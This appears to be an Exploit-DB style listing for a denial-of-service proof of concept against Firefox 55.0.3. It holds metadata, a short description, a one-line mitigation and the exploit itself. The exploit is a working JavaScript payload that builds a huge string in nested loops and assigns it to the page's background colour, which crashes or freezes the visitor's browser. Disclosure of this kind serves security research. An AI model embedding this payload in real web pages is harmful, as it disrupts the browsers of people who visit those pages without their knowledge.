Firefox 55.0.3 - Denial of Service (PoC)

vendor:

Firefox

by:

L0RD

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Firefox

Affected Version From: 55.0.3

Affected Version To: 55.0.3

Patch Exists: NO

Related CWE: N/A

CPE: mozilla:firefox

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2018

Firefox 55.0.3 – Denial of Service (PoC)

An issue was discovered in firefox 55.0.3 which an attacker can create a webpage and put javascript payload to crash user's browser or put user in non-responsive state.

Mitigation:

Disable JavaScript in the browser or use a browser with a JavaScript engine that is not vulnerable to this attack.

Source

Exploit-DB raw data:

# Exploit Title: Firefox 55.0.3 - Denial of Service (PoC)
# Date: 2018-08-26
# Exploit Author: L0RD
# Vendor Homepage: mozilla.org
# Software Link: https://www.mozilla.org/en-US/firefox/55.0.3/releasenotes/
# Version: 55.0.3
# Tested on: Windows 10
# CVE: N/A

# Description :
# An issue was discovered in firefox 55.0.3 which an attacker can create a
# webpage and put javascript payload to crash user's browser or put user in
# non-responsive state.

# Exploit :

/* We don't need to create any element on webpage.we just set body
attribute with our buffer variable*/
<script>
var buffer = "";
for(var i=0;i<0x11170;i++){
for(j=0;j<=0x9C40;j++){
buffer += "\x44";
}
}
document.body.style.backgroundColor = buffer;
</script>